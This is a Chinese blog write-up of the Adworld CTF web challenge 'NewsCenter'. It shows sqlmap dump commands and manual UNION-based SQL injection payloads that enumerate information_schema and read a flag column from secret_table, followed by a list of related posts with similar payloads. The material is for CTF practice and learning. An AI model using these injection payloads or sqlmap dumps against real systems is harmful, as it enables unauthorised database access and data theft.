攻防世界NewsCenter

最新推荐文章于 2022-02-28 16:54:19 发布
最新推荐文章于 2022-02-28 16:54:19 发布
阅读量3.2k 收藏 1
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/121188693
版权

1,sqlmap注入;

将抓包后的请求报文复制粘贴为TXT文件,用sqlmap命令打开:

sqlmap -r D:\\桌面\1.txt --dbs

会发现有两个数据库

 sqlmap -r D:\\桌面\1.txt -D news --dump可看到news里面的所有表中的详细内容;

当然可以直接--dump暴力

2,sql注入

首先判断这可能有sql注入,想着可能是字符型,输入一个字符看看,发现有报错,判定这可以注入;

 然后再用oder by 判断有几个字段;' oder by 3#

最后通过报错机制发现有3个字段;

然后开始进行union注入;

构造 'and 0 union select 1,table_schema,table_name from information_schema.tables #来查看有哪些数据库,并且该数据库下面有哪些表,都一一列出来,发现news的数据库里面有两个表,一个news,一个secret_table

 

很显然我们应该查看的就是这个secret_table,然后再继续构造

'and 0 union select 1,2,column_name from information_schema.columns where table_name="secret_table" #

 这个表下面有fl4g;再构造 'and 0 union select 1,2,fl4g from secret_table# 打开它;即可发现flag

一只Traveler
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界】八 --- NewsCenter
qq_43168364的博客
12-23 379
题目 — NewsCenter 一、writeup 主页一个search输入框,我们来测试sql注入漏洞 输入单引号,回显 500 ,大概率是一个字符型注入点 字段数:3 显示位:2,3 库名:news,用户名:user@10.42.101.146 表名:news, secret_table secret_table表字段名:id,fl4g 读数据,的flag 二、知识点 sql注入 ......
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1753
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
Web安全(NewsCenter)
m0_56010012的博客
02-28 474
如题目环境报错,稍等片刻刷新即可
攻防世界 web进阶区 NewsCenter
trytowritecode的博客
10-11 2456
标题 攻防世界 WEB进阶区 —NewsCenter 最近刚入web这一块想想写了道ctf,新手 勿喷 这也是我第一次写博客 先看题目点开来是这样的界面 说实话一开始没有头绪,看着这个界面觉得很奇怪,但是基于之前写过的几道题我还是按开了F12开发者视图,在里面找了很久没发现什么有用的信息,然后我在想这里有输入框,会不会是xss的题目于是我就写了 发现页面也没有弹窗,于是陷入了漫长的沉思中,然后决定向以往一样先扫个目录看看于是起了dirmap 用 python dirmap.py -i 地址 -lcf
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1178
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
newscenter_app
02-20
新闻中心单击以获取实时版本背景和概述新闻中心现场直播了当今主流媒体如何报道当前的主题。 一次查看CNN,Fox News,NBC,NYTimes和Huffington Post主页上的精选文章。 这个使用React构建的应用程序充当前端,并与...
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
资源来自pypi官网。 资源全名:newscenter-2.0.4.tar.gz
攻防世界web进阶区——NewsCenter(sql注入)
一枚菜鸡
10-22 565
一、基本思路 打开网页后,出现搜索框。确认为sql注入类型。 构造 : ’ and 0 union select 1,2,3 # ’ 闭合数据库查询语句的 ’ , # 注释掉后者。 回显出,2,3字段。证明查询语句返回的数据回显字段为第二个和第三个。再次构造 ’ and 0 union select 1,table_schema,table_name from information_schema.columns # ...
攻防世界】七、NewsCenter
Hi~ 土拨鼠
09-13 435
步骤 打开所给场景: 发现一个输入框,试一下有没有sql注入,使用burp进行抓包(不知道什么原因使用hackbar提交数据页面没变化,卡了好久): 发现单引号'会出现错误,继续进行注入:1' or 1=1 # 发现页面正常,尝试一下联合查询:order by 3/4 判断字段数为3,继续注入: payload:1' union select 1,2,3 # 发现有回显,联合查询可用!接下来就是按照库表列的顺序依次进行查询: payload:1' union select 1,database.
XCTF web NewsCenter(sqlmap简单使用)
H4ppyD0g的博客
09-12 741
打开网页是一个查询操作的输入框,判断应该存在sql注入。 随便输入一些东西后回车,用bp抓包,抓取的内容放到一个1.txt文件里面 之后用到sqlmap sqlmap.py -r 1.txt --dbs 用1.txt内容去搜索对应的所有数据库名 可以爆出两个库 sqlmap.py -r 1.txt -D news --dump 建立可后台news库连接, 搜索所有的数据 sql部分常用参数 ...
攻防世界 - NewsCenter - WriteUp
热门推荐
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
攻防世界NewsCenter思路
yangker12148的博客
05-28 6990
打开环境后发现是这样一个页面 考虑到xss或者sql注入,尝试了alert无果,便试试sql注入,随便输入aaa后使用burp抓包 将这些保存在1.txt里,用sqlmap抓包,命令:sqlmap.py -r 1.txt --dbs 这里看到一个news,在继续,命令:sqlmap.py -r 1.txt -D news --dump 最后就得到flag啦!!! ...
攻防世界-Web-萌新入坑-NaNNaNNaNNaN-Batman(html乱码脚本处理)
Sea_Sand息禅
04-13 1万+
NaNNaNNaNNaN-Batman 下载文件,内容是这样的: 脚本语言,是html文件,修改后缀用浏览器打开得到: 是一个输入框,看来我们要先弄清楚这个文件的代码才行,审计代码可以看到最开始的下划线“_”是一个变量,其内容是一个函数的代码,而最后又是一个eval(_),也就是执行这个函数了,我们把eval改为alert,让程序弹框,得到了源码的非乱码形式: 把得到的代码整理一下就是...
攻防世界(高手进阶区)——NewsCenter
知足且坚定,温柔且上进
02-11 2135
御剑扫一下,发现有robots.txt与config.php,不过是个空白页面;放弃。 用burpsuite抓包,: 尝试xff,无果,直接sql注入,利用sqlmap. 将Request中的Raw内容拷贝到一个txt文档,用sqlmap爆。(注意将文档拷贝到sqlmap文件所在位置) sqlmap.py -r flag.txt --dbs 发现两个包,分别尝试,只有news有: sqlm...
攻防世界web进阶news center
gongjingege的博客
07-11 354
burp suite抓包,sqlmap注入 打开链接 有一个搜索框,随意输入写数字,没有变化,用bp抓包试一下,也没有发现,看了看大佬的wp,才知道考sql注入。。。。 看了下是post,所以然后保存在桌面,123.txt 然后用sqlmap注入(这方面我也不太会。。。) 1,查找数据库 -r C:\Users\123\Desktop\123.txt --dbs 发现有两个数据库 推测应该是news 2,查找news下的表 -r C:\Users\123\Desktop\123.txt --
xctf-web-NewsCenter
Spwpun的博客
03-30 2242
一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解: 查询当前数据库中的所有表名: 1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_...
攻防世界 newscenter
最新发布
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值